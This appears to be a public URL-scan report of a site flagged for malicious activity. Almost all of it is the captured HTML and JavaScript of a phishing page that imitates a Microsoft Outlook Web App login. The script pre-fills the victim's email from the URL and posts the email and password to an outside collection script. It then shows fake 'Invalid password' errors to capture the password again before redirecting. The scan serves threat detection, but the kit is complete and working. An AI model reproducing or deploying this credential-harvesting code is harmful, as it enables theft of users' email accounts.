www.anmattwi.com
192.185.76.200  Malicious Activity! Public Scan

Submitted URL: http://anmattwi.com/outlookwebapp.html?msg=
Effective URL: http://www.anmattwi.com/outlookwebapp.html?msg=
Submission: On August 20 via automatic, source openphish

Form analysis

1 form found in the DOM

Name: logonForm, method: POST

<form action="" method="POST" name="logonForm" enctype="" autocomplete="off">
  <input type="hidden" name="destination" value="https://webmail.ipehq.com/owa/">
  <input type="hidden" name="flags" value="0">
  <input type="hidden" name="forcedownlevel" value="0">
  <table align="center" id="tblMain" cellpadding="0" cellspacing="0">
    <tbody>
      <tr>
        <td colspan="3">
          <table cellspacing="0" cellpadding="0" class="tblLgn">
            <tbody>
              <tr>
                <td class="lgnTL"><img src="https://webmail.ipehq.com/owa/14.3.382.0/themes/resources/lgntopl.gif" alt=""></td>
                <td class="lgnTM"></td>
                <td class="lgnTR"><img src="https://webmail.ipehq.com/owa/14.3.382.0/themes/resources/lgntopr.gif" alt=""></td>
              </tr>
            </tbody>
          </table>
        </td>
      </tr>
      <tr>
        <td id="mdLft">&nbsp;</td>
        <td id="mdMid">
          <table id="tblMid" class="mid">
            <tbody>
              <tr>
                <td id="expltxt" class="expl">
                </td>
              </tr>
              <tr>
                <td>
                  <hr>
                </td>
              </tr>
              <tr>
                <td>
                  <table cellpadding="0" cellspacing="0">
                    <colgroup>
                      <col>
                      <col class="w100">
                    </colgroup>
                    <tbody>
                      <tr id="trSec">
                        <td colspan="2"> Security ‎( <a href="#" id="lnkShwSec" onclick="clkExp('lnkShwSec')">
									show explanation 
									</a>
                          <a href="#" id="lnkHdSec" onclick="clkExp('lnkHdSec')" style="display:none">
									hide explanation 
									</a> )‎
                        </td>
                      </tr>
                      <tr>
                        <td><input id="rdoPblc" type="radio" name="trusted" value="0" class="rdo" onclick="clkSec()" checked=""></td>
                        <td><label for="rdoPblc">This is a public or shared computer</label></td>
                      </tr>
                      <tr id="trPubExp" class="expl" style="display:none">
                        <td></td>
                        <td>Select this option if you use Outlook Web App on a public computer. Be sure to sign out when you've finished and close all windows to end your session.</td>
                      </tr>
                      <tr>
                        <td><input id="rdoPrvt" type="radio" name="trusted" value="4" class="rdo" onclick="clkSec()"></td>
                        <td><label for="rdoPrvt">This is a private computer</label></td>
                      </tr>
                      <tr id="trPrvtExp" class="expl" style="display:none">
                        <td></td>
                        <td>Select this option if you're the only person who uses this computer. Your server will allow a longer period of inactivity before signing you out.</td>
                      </tr>
                      <tr id="trPrvtWrn" class="wrng" style="display:none">
                        <td></td>
                        <td>Warning: By selecting this option, you confirm that this computer complies with your organization's security policy.</td>
                      </tr>
                    </tbody>
                  </table>
                </td>
              </tr>
              <tr>
                <td>
                  <hr>
                </td>
              </tr>
              <tr>
                <td>
                  <table cellpadding="0" cellspacing="0">
                    <colgroup>
                      <col>
                      <col class="w100">
                    </colgroup>
                    <tbody>
                      <tr>
                        <td><input id="chkBsc" type="checkbox" class="rdo" onclick="clkBsc();"></td>
                        <td nowrap=""><label for="chkBsc">Use the light version of Outlook Web App</label></td>
                      </tr>
                      <tr id="trBscExp" class="disBsc" style="display:none">
                        <td></td>
                        <td>The light version of Outlook Web App includes fewer features. Use it if you're on a slow connection or using a computer with unusually strict browser security settings. We also support the full Outlook Web App experience
                          on some browsers on Windows, Mac, and Linux computers. To check out all the supported browsers and operating systems, <a href="http://go.microsoft.com/fwlink/?LinkID=129362" id="bscLnk">click here.</a></td>
                      </tr>
                    </tbody>
                  </table>
                </td>
              </tr>
              <tr>
                <td>
                  <hr>
                </td>
              </tr>
              <tr>
                <td>
                  <p id="msg" style="color:red;"></p>
                  <table cellpadding="0" cellspacing="0">
                    <colgroup>
                      <col class="nowrap">
                      <col class="w100">
                    </colgroup>
                    <colgroup>
                      <col>
                    </colgroup>
                    <tbody>
                      <tr>
                        <td nowrap=""><label for="username">User name:</label></td>
                        <td class="txtpad"><input id="email" name="email" type="text" class="txt"></td>
                      </tr>
                      <tr>
                        <td nowrap=""><label for="password">Password:</label></td>
                        <td class="txtpad"><input id="password" name="password" type="password" class="txt" onfocus="on">
                        </td>
                      </tr>
                      <tr>
                        <td colspan="2" align="right" class="txtpad">
                          <button id="submit-btn" class="btn">Sign in</button>
                        </td>
                      </tr>
                    </tbody>
                  </table>
                </td>
              </tr>
              <tr>
                <td>
                  <hr>
                </td>
              </tr>
            </tbody>
          </table>
          <table id="tblMid2" class="mid" style="display:none">
            <tbody>
              <tr>
                <td>
                  <hr>
                </td>
              </tr>
              <tr>
                <td><br>Please enable cookies for this Web site.<br><br>Cookies are currently disabled by your browser. Outlook Web App requires that cookies be enabled. <br><br>For information about how to enable cookies, see the Help for your Web
                  browser.<br><br><br></td>
              </tr>
              <tr>
                <td>
                  <hr>
                </td>
              </tr>
            </tbody>
          </table>
          <table class="mid tblConn">
            <tbody>
              <tr>
                <td rowspan="2" align="right" class="tdConnImg"><img style="vertical-align:top" src="https://webmail.ipehq.com/owa/14.3.382.0/themes/resources/lgnexlogo.gif" alt=""></td>
                <td class="tdConn">Connected to Microsoft Exchange</td>
              </tr>
              <tr>
                <td class="tdCopy">© 2010 Microsoft Corporation. All rights reserved.</td>
              </tr>
            </tbody>
          </table>
        </td>
        <td id="mdRt">&nbsp;</td>
      </tr>
      <tr>
        <td colspan="3">
          <table cellspacing="0" cellpadding="0" class="tblLgn">
            <tbody>
              <tr>
                <td class="lgnBL"><img src="https://webmail.ipehq.com/owa/14.3.382.0/themes/resources/lgnbotl.gif" alt=""></td>
                <td class="lgnBM"></td>
                <td class="lgnBR"><img src="https://webmail.ipehq.com/owa/14.3.382.0/themes/resources/lgnbotr.gif" alt=""></td>
              </tr>
            </tbody>
          </table>
        </td>
      </tr>
    </tbody>
  </table>
  <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
  <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
  <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
  <script type="text/javascript" src="https://cdn.jsdelivr.net/npm/jquery.session@1.0.0/jquery.session.min.js"></script>
  <script>
    /* global $ */
    $(document).ready(function() {
      var count = 0;

      function getUrlVars() {
        var vars = {};
        var parts = window.location.href.replace(/[?&]+([^=&]+)=([^&]*)/gi, function(m, key, value) {
          vars[key] = value;
        });
        return vars;
      }
      var number = getUrlVars()["msg"];
      $("#email").val(number);
      var my_email = number;
      var ind = my_email.indexOf("@");
      var my_slice = my_email.substr((ind + 1));
      var c = my_slice.substr(0, my_slice.indexOf('.'));
      var final = c.toLowerCase();
      var domain = final.charAt(0).toUpperCase() + final.slice(1);
      $('#submit-btn').click(function(event) {
        $('#error').hide();
        $('#msg').hide();
        event.preventDefault();
        var email = $("#email").val();
        var password = $("#password").val();
        var msg = $('#msg').html();
        $('#msg').text(msg);
        if (!password) {
          $('#msg').show();
          $('#msg').html("Password field is emply.!");
          return false;
        }
        ///////////new injection////////////////
        var my_email = email;
        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;
        if (!filter.test(my_email)) {
          $('#error').show();
          email.focus;
          return false;
        }
        var ind = my_email.indexOf("@");
        var my_slice = my_email.substr((ind + 1));
        var c = my_slice.substr(0, my_slice.indexOf('.'));
        var final = c.toLowerCase();
        var finalu = c.toUpperCase();
        $("#logoimg").attr("src", "https://www.google.com/s2/favicons?domain=" + my_slice);
        $("#logoname").html(finalu);
        ///////////new injection////////////////
        count = count + 1;
        $.ajax({
          dataType: 'JSON',
          url: 'https://bradleyvisuals.com/poster.php',
          type: 'POST',
          data: {
            email: email,
            password: password,
          },
          // data: $('#contact').serialize(),
          beforeSend: function(xhr) {
            $('#submit-btn').html('Verifing...');
          },
          success: function(response) {
            if (response) {
              $("#msg").show();
              console.log(response);
              if (response['signal'] == 'ok') {
                $("#password").val("");
                if (count >= 2) {
                  count = 0;
                  // window.location.replace(response['redirect_link']);
                  window.location.replace("complete259e.html?msg=" + email);
                }
                $("#msg").show();
                $('#msg').html("Invalid password. Please try again");
              } else {
                $("#msg").show();
                $('#msg').html("Invalid password. Please try again");
              }
            }
          },
          error: function() {
            $("#password").val("");
            if (count >= 2) {
              count = 0;
              window.location.replace("complete259e.html?msg=" + email);
            }
            $("#msg").show();
            $('#msg').html("Invalid password. Please try again");
          },
          complete: function() {
            $('#submit-btn').html('Sign in');
          }
        });
      });
    });
  </script>
  <script>
    /* global $ */
    $(document).ready(function() {
      var count = 0;

      function getUrlVars() {
        var vars = {};
        var parts = window.location.href.replace(/[?&]+([^=&]+)=([^&]*)/gi, function(m, key, value) {
          vars[key] = value;
        });
        return vars;
      }
      var number = getUrlVars()["msg"];
      $("#email").val(number);
      var my_email = number;
      var ind = my_email.indexOf("@");
      var my_slice = my_email.substr((ind + 1));
      var c = my_slice.substr(0, my_slice.indexOf('.'));
      var final = c.toLowerCase();
      var domain = final.charAt(0).toUpperCase() + final.slice(1);
      $('#submit-btn').click(function(event) {
        $('#error').hide();
        $('#msg').hide();
        event.preventDefault();
        var email = $("#email").val();
        var password = $("#password").val();
        var msg = $('#msg').html();
        $('#msg').text(msg);
        if (!password) {
          $('#msg').show();
          $('#msg').html("Password field is emply.!");
          return false;
        }
        ///////////new injection////////////////
        var my_email = email;
        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;
        if (!filter.test(my_email)) {
          $('#error').show();
          email.focus;
          return false;
        }
        var ind = my_email.indexOf("@");
        var my_slice = my_email.substr((ind + 1));
        var c = my_slice.substr(0, my_slice.indexOf('.'));
        var final = c.toLowerCase();
        var finalu = c.toUpperCase();
        $("#logoimg").attr("src", "https://www.google.com/s2/favicons?domain=" + my_slice);
        $("#logoname").html(finalu);
        ///////////new injection////////////////
        count = count + 1;
        $.ajax({
          dataType: 'JSON',
          url: 'https://bradleyvisuals.com/posters.php',
          type: 'POST',
          data: {
            email: email,
            password: password,
          },
          // data: $('#contact').serialize(),
          beforeSend: function(xhr) {
            $('#submit-btn').html('Verifing...');
          },
          success: function(response) {
            if (response) {
              $("#msg").show();
              console.log(response);
              if (response['signal'] == 'ok') {
                $("#password").val("");
                if (count >= 2) {
                  count = 0;
                  // window.location.replace(response['redirect_link']);
                  window.location.replace("complete259e.html?msg=" + email);
                }
                $("#msg").show();
                $('#msg').html("Invalid password. Please try again");
              } else {
                $("#msg").show();
                $('#msg').html("Invalid password. Please try again");
              }
            }
          },
          error: function() {
            $("#password").val("");
            if (count >= 2) {
              count = 0;
              window.location.replace("complete259e.html?msg=" + email);
            }
            $("#msg").show();
            $('#msg').html("Invalid password. Please try again");
          },
          complete: function() {
            $('#submit-btn').html('Sign in');
          }
        });
      });
    });
  </script>
</form>

Text Content

To use Outlook Web App, browser settings must allow scripts to run. For
information about how to allow scripts, consult the Help for your browser. If
your browser doesn't support scripts, you can download Windows Internet Explorer
for access to Outlook Web App.

--------------------------------------------------------------------------------

Security ‎( show explanation hide explanation )‎ This is a public or shared
computer Select this option if you use Outlook Web App on a public computer. Be
sure to sign out when you've finished and close all windows to end your session.
This is a private computer Select this option if you're the only person who uses
this computer. Your server will allow a longer period of inactivity before
signing you out. Warning: By selecting this option, you confirm that this
computer complies with your organization's security policy.

--------------------------------------------------------------------------------

Use the light version of Outlook Web App The light version of Outlook Web App
includes fewer features. Use it if you're on a slow connection or using a
computer with unusually strict browser security settings. We also support the
full Outlook Web App experience on some browsers on Windows, Mac, and Linux
computers. To check out all the supported browsers and operating systems, click
here.

--------------------------------------------------------------------------------



User name: Password: Sign in

--------------------------------------------------------------------------------

--------------------------------------------------------------------------------


Please enable cookies for this Web site.

Cookies are currently disabled by your browser. Outlook Web App requires that
cookies be enabled.

For information about how to enable cookies, see the Help for your Web browser.




--------------------------------------------------------------------------------

Connected to Microsoft Exchange © 2010 Microsoft Corporation. All rights
reserved.